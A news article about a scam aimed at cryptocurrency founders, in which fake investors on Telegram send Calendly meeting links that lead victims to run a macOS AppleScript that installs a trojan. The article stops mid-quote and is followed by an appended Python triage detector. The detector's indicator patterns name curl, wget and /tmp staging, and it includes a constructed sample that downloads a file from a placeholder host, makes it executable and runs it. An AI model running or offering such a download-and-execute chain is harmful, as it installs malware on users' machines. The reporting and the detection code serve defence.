Malicious hackers are targeting people in the cryptocurrency space in attacks that start with a link added to the target’s calendar at Calendly, a popular application for scheduling appointments and meetings. The attackers impersonate established cryptocurrency investors and ask to schedule a video conference call. But clicking the meeting link provided by the scammers prompts the user to run a script that quietly installs malware on macOS systems.

KrebsOnSecurity recently heard from a reader who works at a startup that is seeking investment for building a new blockchain platform for the Web. The reader spoke on condition that their name not be used in this story, so for the sake of simplicity we’ll call him Doug.

Being in the cryptocurrency scene, Doug is also active on the instant messenger platform Telegram. Earlier this month, Doug was approached by someone on Telegram whose profile name, image and description said they were Ian Lee, from Signum Capital, a well-established investment firm based in Singapore.

[Image: Mr. Lee’s Twitter/X account, which features the same profile image.]

The investor expressed interest in financially supporting Doug’s startup, and asked if Doug could find time for a video call to discuss investment prospects. Sure, Doug said, here’s my Calendly profile, book a time and we’ll do it then.

When the day and time of the scheduled meeting with Mr. Lee arrived, Doug clicked the meeting link in his calendar but nothing happened. Doug then messaged the Mr. Lee account on Telegram, who said there was some kind of technology issue with the video platform, and that their IT people suggested using a different meeting link.

Doug clicked the new link, but instead of opening up a videoconference app, a message appeared on his Mac saying the video service was experiencing technical difficulties.

“Some of our users are facing issues with our service,” the message read. “We are actively working on fixing these problems. Please refer to this script as a temporary solution.”

Doug said he ran the script, but nothing appeared to happen after that, and the videoconference application still wouldn’t start. Mr. Lee apologized for the inconvenience and said they would have to reschedule their meeting, but he never responded to any of Doug’s follow-up messages.

It didn’t dawn on Doug until days later that the missed meeting with Mr. Lee might have been a malware attack. Going back to his Telegram client to revisit the conversation, Doug discovered his potential investor had deleted the meeting link and other bits of conversation from their shared chat history.

In a post to its Twitter/X account last month, Signum Capital warned that a fake profile pretending to be their employee Mr. Lee was trying to scam people on Telegram.

The file that Doug ran is a simple Apple Script (file extension “.scpt”) that downloads and executes a malicious trojan made to run on macOS systems. Unfortunately for us, Doug freaked out after deciding he’d been tricked - backing up his important documents, changing his passwords, and then reinstalling macOS on his computer. While this is a perfectly sane response, it means we don’t have the actual malware that was pushed to his Mac by the script.

But Doug does still have a copy of the malicious script that was downloaded from clicking the meeting link (the online host serving that link is now offline). A search in Google for a string of text from that script turns up a December 2023 blog post from cryptocurrency security firm SlowMist about phishing attacks on Telegram from North Korean state-sponsored hackers.

“When the project team clicks the link, they encounter a region access restriction,” SlowMist wrote. “At this point, the North Korean hackers coax the team into downloading and running a ‘location-modifying’ malicious script.
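An added defender-side example, not code from the article, from Doug or from SlowMist: a small Python triage check for the download-and-execute pattern the article attributes to the “.scpt” lure. It assumes the script has already been turned into text (a compiled .scpt can be converted on macOS with `osadecompile`), and the two sample scripts below are constructed for the check, not the real file Doug ran.

```python
import re
from dataclasses import dataclass, field

# Indicators a defender would expect in an AppleScript dropper of the kind the
# article describes: a shell-out that fetches a payload and then runs it, plus
# the "temporary solution" style lure text. These are triage assumptions, not a
# signature of the actual script (which is not reproduced on the page).
INDICATORS = {
    "shell_out":     re.compile(r"do shell script", re.I),
    "downloader":    re.compile(r"\b(curl|wget)\b", re.I),
    "make_exec":     re.compile(r"chmod\s+\+?x", re.I),
    "exec_from_tmp": re.compile(r"(/tmp/|/private/tmp/|\$TMPDIR)", re.I),
    "decode_stage":  re.compile(r"base64\s+(-D|--decode)", re.I),
    "hidden_run":    re.compile(r"(nohup|with administrator privileges)", re.I),
    "lure_text":     re.compile(r"(technical difficulties|temporary solution|region|location)", re.I),
}

@dataclass
class Verdict:
    score: int
    hits: list = field(default_factory=list)

def triage_applescript(source: str) -> Verdict:
    """Count distinct indicators present in decompiled AppleScript text."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(source)]
    return Verdict(score=len(hits), hits=hits)

def is_download_and_execute(v: Verdict) -> bool:
    """Flag only when a shell-out and a downloader co-occur with a third indicator."""
    return "shell_out" in v.hits and "downloader" in v.hits and v.score >= 3

# Constructed sample mimicking the lure chain in the article (not the real script).
SAMPLE_DROPPER = '''-- constructed sample, not the real script
display dialog "Some of our users are facing issues with our service. Please refer to this script as a temporary solution." buttons {"OK"}
do shell script "curl -s -o /tmp/.update https://example.invalid/u && chmod +x /tmp/.update && /tmp/.update"
'''

# Constructed benign sample: a plain UI automation script.
SAMPLE_BENIGN = '''tell application "Finder" to display dialog "Hello"'''

if __name__ == "__main__":
    for label, src in (("dropper", SAMPLE_DROPPER), ("benign", SAMPLE_BENIGN)):
        v = triage_applescript(src)
        print(label, v.score, v.hits, "SUSPICIOUS" if is_download_and_execute(v) else "ok")
```

The check is deliberately conservative: a single `do shell script` is common in legitimate automation, so it only flags when a downloader and at least one more staging indicator appear alongside it.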